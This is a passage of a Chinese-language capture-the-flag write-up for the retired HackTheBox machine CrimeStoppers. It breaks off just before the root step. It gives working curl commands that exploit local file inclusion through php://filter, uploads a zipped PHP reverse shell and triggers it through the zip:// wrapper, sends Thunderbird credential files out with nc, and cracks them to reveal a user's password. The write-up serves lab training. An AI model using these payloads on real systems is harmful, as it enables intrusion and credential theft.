本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.80
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.80 -o ./CrimeStoppers-autorecon
扫描结果:
就开了一个web应用80端口,访问看看
再看看爆破出来的目录
都访问了一边发现很多访问的url地址都是类似带?op= 怀疑存在LFI,试了试%00截断进行文件包含,发现目标靶机有防护不能正常利用,经过多次测试和网上的资料确认可以通过php://filter/convert.base64-encode 进行绕过防护任意文件读取,相关参考文章如下:
https://pure.security/abusing-php-wrappers/
既然可以读取任意文件,那我们通过读取上面扫描出来的文件,通过分析得出可以上传反弹shell代码然后使用zip的方式执行命令,具体读取方式如下:
curl -sD - 10.10.10.80/?op=php://filter/convert.base64-encode/resource=index | head -44 | tail -1 | cut -d' ' -f1 | base64 -d > index.php curl -sD - 10.10.10.80/?op=php://filter/convert.base64-encode/resource=list | head -44 | tail -1 | cut -d' ' -f1 | base64 -d > list.php curl -sD - 10.10.10.80/?op=php://filter/convert.base64-encode/resource=upload | head -44 | tail -1 | cut -d' ' -f1 | base64 -d > upload.php curl -sD - 10.10.10.80/?op=php://filter/convert.base64-encode/resource=common | head -44 | tail -1 | cut -d' ' -f1 | base64 -d > common.php
重点代码:
上传php反弹shell代码或者上传一句话都可以,这里有两种方式,具体如下:
1.使用curl参数上传,详细的参数说明请一定要参考官方帮助文档
获取session和token curl -sD - http://10.10.10.80/?op=upload | grep -e PHPSESSID -e 'name="token"' 如果想查看curl执行的http请求包,可以本地开启burpsuite然后 -x 127.0.0.1:8080 执行上面会得出下面结果 Set-Cookie: PHPSESSID=0kbemel0dpno38a45r0p5s43u6; path=/ <input type="text" id="token" name="token" style="display: none" value="3816ad85a500200bc467d4e558a1abf97ce9f87f06a5aefee2d2a5a3d577bfd6" style="355px;" /> ----------------------------------------------------------------------------------- curl -X POST -sD - -F "tip=<shell1.zip" -F "name=a" -F "token=3816ad85a500200bc467d4e558a1abf97ce9f87f06a5aefee2d2a5a3d577bfd6" -F "submit=Send Tip!" http://10.10.10.80/?op=upload -H "Referer: http://10.10.10.80/?op=upload" -H "Cookie: admin=1; PHPSESSID=0kbemel0dpno38a45r0p5s43u6" | grep Location 上述执行结果如下: Location: ?op=view&secretname=5a482dc8883f2861d601f95b7f64b65a7402b1cf http://10.10.10.80/?op=zip://uploads/10.10.14.5/5a482dc8883f2861d601f95b7f64b65a7402b1cf%23shell1
上述操作完毕就得到了上传的路径文件,然后可以开始利用了,本地kali监听8833端口,然后触发反弹代码
成功反弹,这里使用通过curl命令直接反弹shell
2.使用burpsuite上传小马代码
这里相对来说,我认为使用burpsuite方式更简单,在使用的时候一定要记得是需要打开burpsuite的拦截模式然后在浏览器页面进行上传,此时burpsuite会拦截上传数据包,然后使用粘贴到文件,此时选择实现打包好的zip文件,完成之后Forward,会获得上传的文件路径,利用即可
点击Forward即可转发到上传的文件路径
到了此处就可以像上面curl的演示一样,使用zip命令触发即可,下面就不演示了,跟上面一样,继续下面的旅程,拿到shell之后升级成tty-shell然后翻看了下家目录的所有文件和文件夹,发现一个雷鸟邮件客户端
经过查询确认可以通过key3.db和logins.json这两个文件来获取密码,使用nc将这两个文件传到本地kali,然后使用开源的工具读取密码,链接地址:https://github.com/lclevy/firepwd
得出了用户dom的密码是Gummer59 直接su切换过去
通过读取雷鸟客户端中的邮件内容,确认目标主机存在apache rootkit后门,具体分析参考:https://0xdf.gitlab.io/2018/06/03/htb-crimestoppers.html#apache_modrootme
最终通过下面方式获取root权限
